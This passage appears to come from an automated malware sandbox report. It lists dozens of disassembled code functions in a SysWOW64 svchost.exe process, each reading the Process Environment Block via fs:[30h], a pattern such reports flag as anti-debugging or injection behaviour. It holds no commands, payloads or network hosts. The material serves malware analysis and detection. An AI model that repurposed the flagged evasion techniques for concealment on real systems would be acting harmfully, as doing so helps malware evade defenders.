                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h] 1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h] 1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h] 1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h] 1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h] 1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h] 1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h] 1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h] 1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h] 1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h] 1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h] 1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h] 1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h] 1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h] 1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h] 1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h] 1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h] 1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h] 1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h] 1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h] 1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h] 1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h] 1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h] 1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h] 1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h] 1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h] 1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03632582 mov eax, dword ptr fs:[00000030h] 1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h] 1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03664588 mov eax, dword ptr fs:[00000030h] 1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h] 1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h] 1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h] 1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h] 1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h] 1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h] 1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h] 1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362645D mov eax, dword ptr fs:[00000030h] 1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365245A mov eax, dword ptr fs:[00000030h] 1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h] 1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h] 1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h] 1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h] 1_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h] 1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h] 1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h] 1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h] 1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h] 1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h] 1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h] 1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03668402 mov eax, dword ptr fs:[00000030h] 1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03668402 mov eax, dword ptr fs:[00000030h] 1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03668402 mov eax, dword ptr fs:[00000030h] 1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h] 1_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036364AB mov eax, dword ptr fs:[00000030h] 1_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h] 1_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h] 1_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h] 1_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h] 1_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h] 1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h] 1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h] 1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h] 1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h] 1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h] 1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h] 1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h] 1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h] 1_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h] 1_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h] 1_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h] 1_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h] 1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h] 1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h] 1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h] 1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h] 1_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h] 1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h] 1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h] 1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h] 1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h] 1_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h] 1_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h] 1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h] 1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h] 1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h] 1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h] 1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h] 1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h] 1_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h] 1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h] 1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h] 1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h] 1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h] 1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h] 1_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h] 1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h] 1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h] 1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h] 1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h] 1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h] 1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h] 1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h] 1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h] 1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h] 1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h] 1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h] 1_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h] 1_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h] 1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h] 1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h] 1_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h] 1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h] 1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h] 1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h] 1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h] 1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h] 1_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h] 1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h] 1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h] 1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h] 1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]1_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]1_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]1_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
